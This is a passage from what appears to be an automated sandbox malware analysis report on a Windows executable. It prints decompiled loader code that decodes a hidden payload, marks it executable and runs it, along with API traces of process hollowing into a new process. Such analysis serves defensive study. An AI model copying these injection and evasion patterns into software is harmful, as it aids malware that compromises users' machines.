    				intOrPtr* _t58;
    				long _t65;
    				long _t69;
    				int _t73;
    				void* _t79;
    				int _t80;
    
    				_t41 = E03002C60(0x300cb48);
    				_t80 = 0;
    				if(_t41 > 0x1b3 && _v72.cStencilBits != 0x84b9b && _v72.cStencilBits != 0x1104) {
    					E0300958A(_t41);
    					ShellExecuteA(0, 0, 0, 0, 0, 0);
    					ShellAboutW(0, 0, 0, 0);
    					ExtractIconA(0, 0, 0);
    					_push("osurhfoiuasdf asdiuyfghas dofioaysgfuioaysdgf");
    					_push(0x300cb48);
    					E03002BD0();
    				}
    				_v12 = 1;
    				_v12 = 0x583e9;
    				GetColorSpace(_t80);
    				GetLogColorSpaceA(_t80, _t80, _t80);
    				ChoosePixelFormat(_t80,  &_v72); // executed
    				SetICMMode(_t80, _t80);
    				_v20 = _t80;
    				_v24 = _t80;
    				do {
    					_t47 = GetPrivateProfileSectionNamesA(0x300cb48, _t80, "doifughsg siodufhg sdfoughjsiopdfughj"); // executed
    					_t65 = _t47;
    					__imp__GetCalendarInfoW(_t80, _t80, _t80, _t80, _t80,  &_v28); // executed
    					_t49 = GetLocaleInfoW(_t80, _t80, 0x300cf50, _t80);
    					if(_v20 > 0x7530 && _t65 != 0x6f6f3 && _v28 != 0x4278f9 && _t49 != 0x176cf5a) {
    						_v24 = 0x6f;
    						 *0x300cf48 = GetModuleHandleW(L"kernel32.dll");
    					}
    					_v20 = _v20 + 1;
    				} while (_v24 != 0x6f);
    				_t50 = LocalAlloc(_t80, _v12); // executed
    				_v24 = 0x30142d8;
    				_t73 = _v24;
    				_t79 = _t50;
    				_t69 = 0;
    				_v32 = _t79;
    				if(_v12 > _t80) {
    					_v20 = 0xfffffffe;
    					_v20 = _v20 - _t73;
    					_t23 = _t73 + 2; // 0x30142da
    					_t58 = _t23;
    					do {
    						_t24 = _t58 - 1; // 0x586416a5
    						_v5 =  *_t58;
    						_t26 = _t58 - 2; // 0x6416a5c8
    						 *((char*)(_t69 + _t79)) =  *_t26;
    						 *((char*)(_t69 + _t79 + 1)) =  *_t24;
    						 *((char*)(_t69 + _t79 + 2)) = _v5;
    						_t58 = _t58 + 3;
    						_t69 = _t69 + 3;
    					} while (_v20 + _t58 < _v12);
    				}
    				_v12 = _t69;
    				VirtualProtect(_t79, 0x583e9, 0x40,  &_v16); // executed
    				if(_v12 > _t80) {
    					do {
    						GetTickCount();
    						_t80 = _t80 + 1;
    					} while (_t80 < _v12);
    				}
    				E03009651( &_v12, _t79);
    				_v32();
    				return 0;
    			}






















    APIs
    • _strlen.LIBCMT ref: 0300967E
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
    • ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
    • ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
    • GetColorSpace.GDI32(00000000), ref: 030096DF
    • GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
    • ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
    • SetICMMode.GDI32(00000000,00000000), ref: 030096FB
    • GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
    • GetCalendarInfoW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
    • GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
    • LocalAlloc.KERNELBASE(00000000,000583E9), ref: 03009778
    • VirtualProtect.KERNELBASE(00000000,000583E9,00000040,?), ref: 030097D9
    • GetTickCount.KERNEL32 ref: 030097E4
      • Part of subcall function 0300958A: WinHttpCloseHandle.WINHTTP(00000000,00000000,030096A4), ref: 0300958E
      • Part of subcall function 0300958A: WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000), ref: 03009598
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0027E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0027E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0027E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0027E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0027E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0027E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0027E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0027E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0027E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0027E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0027E35A
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03003F30() {
    
    				SetUnhandledExceptionFilter(E03003EEE); // executed
    				return 0;
    			}




    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00003EEE), ref: 03003F35
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E03004E89(void* __ebx) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t7;
    				long _t10;
    				void* _t11;
    				int _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t18;
    				intOrPtr* _t20;
    				intOrPtr _t21;
    				intOrPtr* _t23;
    				long _t26;
    				void* _t30;
    				struct HINSTANCE__* _t35;
    				intOrPtr* _t36;
    				void* _t39;
    				intOrPtr* _t41;
    				void* _t42;
    
    				_t30 = __ebx;
    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
    				if(_t35 != 0) {
    					 *0x300c63c = GetProcAddress(_t35, "FlsAlloc");
    					 *0x300c640 = GetProcAddress(_t35, "FlsGetValue");
    					 *0x300c644 = GetProcAddress(_t35, "FlsSetValue");
    					_t7 = GetProcAddress(_t35, "FlsFree");
    					__eflags =  *0x300c63c;
    					_t39 = TlsSetValue;
    					 *0x300c648 = _t7;
    					if( *0x300c63c == 0) {
    						L6:
    						 *0x300c640 = TlsGetValue;
    						 *0x300c63c = E03004B99;
    						 *0x300c644 = _t39;
    						 *0x300c648 = TlsFree;
    					} else {
    						__eflags =  *0x300c640;
    						if( *0x300c640 == 0) {
    							goto L6;
    						} else {
    							__eflags =  *0x300c644;
    							if( *0x300c644 == 0) {
    								goto L6;
    							} else {
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    					_t10 = TlsAlloc();
    					 *0x300b1c4 = _t10;
    					__eflags = _t10 - 0xffffffff;
    					if(_t10 == 0xffffffff) {
    						L15:
    						_t11 = 0;
    						__eflags = 0;
    					} else {
    						_t12 = TlsSetValue(_t10,  *0x300c640);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L15;
    						} else {
    							E03003F93();
    							_t41 = __imp__EncodePointer; // executed
    							_t14 =  *_t41( *0x300c63c); // executed
    							 *0x300c63c = _t14; // executed
    							_t15 =  *_t41( *0x300c640); // executed
    							 *0x300c640 = _t15; // executed
    							_t16 =  *_t41( *0x300c644); // executed
    							 *0x300c644 = _t16; // executed
    							_t17 =  *_t41( *0x300c648); // executed
    							 *0x300c648 = _t17;
    							_t18 = E03006D14();
    							__eflags = _t18;
    							if(_t18 == 0) {
    								L14:
    								E03004BD6();
    								goto L15;
    							} else {
    								_t36 = __imp__DecodePointer;
    								_t20 =  *_t36( *0x300c63c, E03004D5A); // executed
    								_t21 =  *_t20();
    								 *0x300b1c0 = _t21;
    								__eflags = _t21 - 0xffffffff;
    								if(_t21 == 0xffffffff) {
    									goto L14;
    								} else {
    									_t42 = E03006933(1, 0x214);
    									__eflags = _t42;
    									if(_t42 == 0) {
    										goto L14;
    									} else {
    										_t23 =  *_t36( *0x300c644,  *0x300b1c0, _t42); // executed
    										__eflags =  *_t23();
    										if(__eflags == 0) {
    											goto L14;
    										} else {
    											_push(0);
    											_push(_t42);
    											E03004C13(_t30, _t36, _t42, __eflags);
    											_t26 = GetCurrentThreadId();
    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
    											 *_t42 = _t26;
    											_t11 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t11;
    				} else {
    					E03004BD6();
    					return 0;
    				}
    			}

























    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
    • TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
    • TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03006D14: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 03006D3C
    • DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    • GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
      • Part of subcall function 03004BD6: DecodePointer.KERNEL32(00000003,03004FFF,?,03002D9E), ref: 03004BE7
      • Part of subcall function 03004BD6: TlsFree.KERNEL32(00000014,03004FFF,?,03002D9E), ref: 03004C01
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000000,00000000,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000014,774FA0FD,?,03004FFF,?,03002D9E), ref: 03006DA5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 57%
    			E03002D14() {
    				intOrPtr _t22;
    				void* _t26;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    				intOrPtr _t33;
    				void* _t43;
    				signed int _t45;
    				void* _t55;
    				void* _t56;
    				void* _t57;
    				void* _t59;
    				intOrPtr _t60;
    				void* _t61;
    
    				_push(0x58);
    				_push(0x3009808);
    				E03005030(_t43, _t56, _t57);
    				GetStartupInfoW(_t59 - 0x68);
    				_t60 =  *0x301309c; // 0x0
    				if(_t60 == 0) {
    					__imp__HeapSetInformation(0, 1, 0, 0);
    				}
    				_t61 =  *0x3000000 - 0x5a4d; // 0x5a4d
    				if(_t61 == 0) {
    					_t22 =  *0x300003c; // 0xe8
    					__eflags =  *((intOrPtr*)(_t22 + 0x3000000)) - 0x4550;
    					if( *((intOrPtr*)(_t22 + 0x3000000)) != 0x4550) {
    						goto L3;
    					} else {
    						__eflags =  *((intOrPtr*)(_t22 + 0x3000018)) - 0x10b;
    						if( *((intOrPtr*)(_t22 + 0x3000018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t22 + 0x3000074)) - 0xe;
    							if( *((intOrPtr*)(_t22 + 0x3000074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t22 + 0x30000e8);
    								_t8 =  *(_t22 + 0x30000e8) != 0;
    								__eflags = _t8;
    								 *(_t59 - 0x1c) = 0 | _t8;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t59 - 0x1c) = 0;
    				}
    				if(E03005004() == 0) {
    					E03002CEB(0x1c);
    				}
    				if(E03004E89(_t43) == 0) {
    					E03002CEB(0x10);
    				}
    				E03004B44();
    				 *((intOrPtr*)(_t59 - 4)) = 0;
    				_t26 = E030048FF(); // executed
    				_t64 = _t26;
    				if(_t26 < 0) {
    					_push(0x1b);
    					E0300420B(_t55, _t64);
    				}
    				 *0x3013098 = GetCommandLineW();
    				 *0x300bdc4 = E030048A7();
    				_t29 = E030047F9();
    				_t65 = _t29;
    				if(_t29 < 0) {
    					_push(8);
    					_t29 = E0300420B(_t55, _t65);
    				}
    				_t30 = E030045C7(_t29, _t43);
    				_t66 = _t30;
    				if(_t30 < 0) {
    					_push(9);
    					E0300420B(_t55, _t66);
    				}
    				_t31 = E03003FEA(_t56, 0, 1); // executed
    				_t67 = _t31;
    				if(_t31 != 0) {
    					_push(_t31);
    					E0300420B(_t55, _t67);
    				}
    				_t32 = E03004581();
    				_t68 =  *(_t59 - 0x3c) & 0x00000001;
    				if(( *(_t59 - 0x3c) & 0x00000001) == 0) {
    					_t45 = 0xa;
    				} else {
    					_t45 =  *(_t59 - 0x38) & 0x0000ffff;
    				}
    				_t33 = E0300966F(_t68, 0x3000000, 0, _t32, _t45); // executed
    				 *((intOrPtr*)(_t59 - 0x20)) = _t33;
    				if( *(_t59 - 0x1c) == 0) {
    					E030041C1(_t33); // executed
    				}
    				E030041ED();
    				 *((intOrPtr*)(_t59 - 4)) = 0xfffffffe;
    				return E03005075( *((intOrPtr*)(_t59 - 0x20)));
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?,03009808,00000058), ref: 03002D24
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 03002D39
      • Part of subcall function 03005004: HeapCreate.KERNELBASE(00000000,00001000,00000000,03002D8D), ref: 0300500D
      • Part of subcall function 03004E89: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
      • Part of subcall function 03004E89: GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
      • Part of subcall function 03004E89: TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
      • Part of subcall function 03004E89: TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
      • Part of subcall function 03004E89: EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03004E89: DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004E89: GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
    • __RTC_Initialize.LIBCMT ref: 03002DAA
      • Part of subcall function 030048FF: GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 030048FF: GetFileType.KERNEL32(?), ref: 03004A3F
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
      • Part of subcall function 030048FF: GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
      • Part of subcall function 030048FF: GetFileType.KERNEL32(00000000), ref: 03004ADB
      • Part of subcall function 030048FF: InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
      • Part of subcall function 030048FF: SetHandleCount.KERNEL32 ref: 03004B32
    • __amsg_exit.LIBCMT ref: 03002DBD
    • GetCommandLineW.KERNEL32 ref: 03002DC3
      • Part of subcall function 030048A7: GetEnvironmentStringsW.KERNEL32(00000000,03002DD3), ref: 030048AA
      • Part of subcall function 030048A7: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 030048E6
      • Part of subcall function 030047F9: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\obtG43AWHP.exe,00000104), ref: 03004819
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004843
      • Part of subcall function 030047F9: _wparse_cmdline.LIBCMT ref: 03004885
    • __amsg_exit.LIBCMT ref: 03002DE3
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 030045E7
      • Part of subcall function 030045C7: _wcslen.LIBCMT ref: 0300461F
    • __amsg_exit.LIBCMT ref: 03002DF4
      • Part of subcall function 03003FEA: __initterm_e.LIBCMT ref: 03004020
    • __amsg_exit.LIBCMT ref: 03002E07
      • Part of subcall function 0300966F: _strlen.LIBCMT ref: 0300967E
      • Part of subcall function 0300966F: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 030096AA
      • Part of subcall function 0300966F: ShellAboutW.SHELL32(00000000,00000000,00000000,00000000), ref: 030096B4
      • Part of subcall function 0300966F: ExtractIconA.SHELL32(00000000,00000000,00000000), ref: 030096BD
      • Part of subcall function 0300966F: GetColorSpace.GDI32(00000000), ref: 030096DF
      • Part of subcall function 0300966F: GetLogColorSpaceA.GDI32(00000000,00000000,00000000), ref: 030096E8
      • Part of subcall function 0300966F: ChoosePixelFormat.GDI32(00000000,?), ref: 030096F3
      • Part of subcall function 0300966F: SetICMMode.GDI32(00000000,00000000), ref: 030096FB
      • Part of subcall function 0300966F: GetPrivateProfileSectionNamesA.KERNEL32(0300CB48,00000000,doifughsg siodufhg sdfoughjsiopdfughj), ref: 0300970E
      • Part of subcall function 0300966F: GetCalendarInfoW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?), ref: 0300971F
      • Part of subcall function 0300966F: GetLocaleInfoW.KERNEL32(00000000,00000000,0300CF50,00000000), ref: 0300972D
      • Part of subcall function 0300966F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03009760
      • Part of subcall function 0300966F: LocalAlloc.KERNELBASE(00000000,000583E9), ref: 03009778
      • Part of subcall function 0300966F: VirtualProtect.KERNELBASE(00000000,000583E9,00000040,?), ref: 030097D9
      • Part of subcall function 0300966F: GetTickCount.KERNEL32 ref: 030097E4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E030048FF() {
    				intOrPtr* _v8;
    				void** _v12;
    				struct _STARTUPINFOW _v80;
    				signed int _t61;
    				void* _t62;
    				long _t65;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				int _t72;
    				signed int _t73;
    				intOrPtr* _t74;
    				void* _t77;
    				long _t85;
    				signed int _t86;
    				signed int _t87;
    				signed int _t88;
    				signed int _t91;
    				int _t93;
    				signed char _t98;
    				void* _t108;
    				signed int _t110;
    				signed int* _t111;
    				int _t112;
    				void** _t115;
    				void** _t120;
    				signed int _t121;
    
    				GetStartupInfoW( &_v80);
    				_push(0x40);
    				_t112 = 0x20;
    				_push(_t112); // executed
    				_t61 = E03006933(); // executed
    				if(_t61 != 0) {
    					_t2 = _t61 + 0x800; // 0x800
    					 *0x3012f80 = _t61;
    					 *0x3012f68 = _t112;
    					__eflags = _t61 - _t2;
    					if(_t61 >= _t2) {
    						L5:
    						__eflags = _v80.cbReserved2;
    						if(_v80.cbReserved2 == 0) {
    							L27:
    							_t91 = 0;
    							__eflags = 0;
    							do {
    								_t115 = (_t91 << 6) +  *0x3012f80;
    								_t62 =  *_t115;
    								__eflags = _t62 - 0xffffffff;
    								if(_t62 == 0xffffffff) {
    									L31:
    									_t115[1] = 0x81;
    									__eflags = _t91;
    									if(_t91 != 0) {
    										_t50 = _t91 - 1; // -1
    										asm("sbb eax, eax");
    										_t65 =  ~_t50 + 0xfffffff5;
    										__eflags = _t65;
    									} else {
    										_t65 = 0xfffffff6;
    									}
    									_t108 = GetStdHandle(_t65);
    									__eflags = _t108 - 0xffffffff;
    									if(_t108 == 0xffffffff) {
    										L43:
    										_t58 =  &(_t115[1]);
    										 *_t58 = _t115[1] | 0x00000040;
    										__eflags =  *_t58;
    										 *_t115 = 0xfffffffe;
    										goto L44;
    									} else {
    										__eflags = _t108;
    										if(_t108 == 0) {
    											goto L43;
    										}
    										_t69 = GetFileType(_t108);
    										__eflags = _t69;
    										if(_t69 == 0) {
    											goto L43;
    										}
    										_t70 = _t69 & 0x000000ff;
    										 *_t115 = _t108;
    										__eflags = _t70 - 2;
    										if(_t70 != 2) {
    											__eflags = _t70 - 3;
    											if(_t70 == 3) {
    												_t53 =  &(_t115[1]);
    												 *_t53 = _t115[1] | 0x00000008;
    												__eflags =  *_t53;
    											}
    										} else {
    											_t115[1] = _t115[1] | 0x00000040;
    										}
    										_t55 =  &(_t115[3]); // -50409332
    										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
    										__eflags = _t72;
    										if(_t72 == 0) {
    											L48:
    											_t68 = _t72 | 0xffffffff;
    											L46:
    											return _t68;
    										} else {
    											_t115[2] = _t115[2] + 1;
    											goto L44;
    										}
    									}
    								}
    								__eflags = _t62 - 0xfffffffe;
    								if(_t62 == 0xfffffffe) {
    									goto L31;
    								}
    								_t115[1] = _t115[1] | 0x00000080;
    								L44:
    								_t91 = _t91 + 1;
    								__eflags = _t91 - 3;
    							} while (_t91 < 3);
    							SetHandleCount( *0x3012f68);
    							_t68 = 0;
    							__eflags = 0;
    							goto L46;
    						}
    						_t73 = _v80.lpReserved2;
    						__eflags = _t73;
    						if(_t73 == 0) {
    							goto L27;
    						}
    						_t93 =  *_t73;
    						_t74 = _t73 + 4;
    						_v8 = _t74;
    						_v12 = _t74 + _t93;
    						__eflags = _t93 - 0x800;
    						if(_t93 >= 0x800) {
    							_t93 = 0x800;
    						}
    						__eflags =  *0x3012f68 - _t93; // 0x20
    						if(__eflags >= 0) {
    							L18:
    							_t110 = 0;
    							__eflags = _t93;
    							if(_t93 <= 0) {
    								goto L27;
    							} else {
    								goto L19;
    							}
    							do {
    								L19:
    								_t77 =  *_v12;
    								__eflags = _t77 - 0xffffffff;
    								if(_t77 == 0xffffffff) {
    									goto L26;
    								}
    								__eflags = _t77 - 0xfffffffe;
    								if(_t77 == 0xfffffffe) {
    									goto L26;
    								}
    								_t98 =  *_v8;
    								__eflags = _t98 & 0x00000001;
    								if((_t98 & 0x00000001) == 0) {
    									goto L26;
    								}
    								__eflags = _t98 & 0x00000008;
    								if((_t98 & 0x00000008) != 0) {
    									L24:
    									_t120 = ((_t110 & 0x0000001f) << 6) + 0x3012f80[_t110 >> 5];
    									 *_t120 =  *_v12;
    									_t120[1] =  *_v8;
    									_t40 =  &(_t120[3]); // 0xc
    									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L48;
    									}
    									_t41 =  &(_t120[2]);
    									 *_t41 = _t120[2] + 1;
    									__eflags =  *_t41;
    									goto L26;
    								}
    								_t85 = GetFileType(_t77);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									goto L26;
    								}
    								goto L24;
    								L26:
    								_v12 =  &(_v12[1]);
    								_t110 = _t110 + 1;
    								_v8 = _v8 + 1;
    								__eflags = _t110 - _t93;
    							} while (_t110 < _t93);
    							goto L27;
    						} else {
    							_t111 = 0x3012f84;
    							while(1) {
    								_t86 = E03006933(0x20, 0x40);
    								__eflags = _t86;
    								if(_t86 == 0) {
    									break;
    								}
    								 *0x3012f68 =  *0x3012f68 + 0x20;
    								_t16 = _t86 + 0x800; // 0x800
    								 *_t111 = _t86;
    								__eflags = _t86 - _t16;
    								if(_t86 >= _t16) {
    									L15:
    									_t111 =  &(_t111[1]);
    									__eflags =  *0x3012f68 - _t93; // 0x20
    									if(__eflags < 0) {
    										continue;
    									}
    									goto L18;
    								}
    								_t87 = _t86 + 5;
    								__eflags = _t87;
    								do {
    									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
    									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
    									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
    									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
    									 *((short*)(_t87 - 1)) = 0xa00;
    									 *((short*)(_t87 + 0x20)) = 0xa0a;
    									 *((char*)(_t87 + 0x2f)) = 0;
    									_t87 = _t87 + 0x40;
    									_t28 = _t87 - 5; // -74
    									__eflags = _t28 -  *_t111 + 0x800;
    								} while (_t28 <  *_t111 + 0x800);
    								goto L15;
    							}
    							_t93 =  *0x3012f68; // 0x20
    							goto L18;
    						}
    					}
    					_t88 = _t61 + 5;
    					__eflags = _t88;
    					do {
    						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
    						 *((short*)(_t88 - 1)) = 0xa00;
    						 *((intOrPtr*)(_t88 + 3)) = 0;
    						 *((short*)(_t88 + 0x1f)) = 0xa00;
    						 *((char*)(_t88 + 0x21)) = 0xa;
    						 *((intOrPtr*)(_t88 + 0x33)) = 0;
    						 *((char*)(_t88 + 0x2f)) = 0;
    						_t121 =  *0x3012f80; // 0x12809f0
    						_t88 = _t88 + 0x40;
    						_t11 = _t88 - 5; // -74
    						__eflags = _t11 - _t121 + 0x800;
    					} while (_t11 < _t121 + 0x800);
    					goto L5;
    				}
    				return _t61 | 0xffffffff;
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • GetFileType.KERNEL32(?), ref: 03004A3F
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
    • GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
    • GetFileType.KERNEL32(00000000), ref: 03004ADB
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
    • SetHandleCount.KERNEL32 ref: 03004B32
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0027E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0027E4B6
      • Part of subcall function 0027E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0027E0C6
      • Part of subcall function 0027E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0027E0DC
      • Part of subcall function 0027E080: CreateProcessA.KERNEL32(?,00000000), ref: 0027E1C2
      • Part of subcall function 0027E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0027E1F0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453650771.0027D000.00000040.sdmp, Offset: 0027D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_27d000_obtG43AWHP.jbxd
    C-Code - Quality: 24%
    			E03004081(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				void* _t36;
    				intOrPtr* _t40;
    				intOrPtr _t43;
    				intOrPtr _t45;
    				intOrPtr _t47;
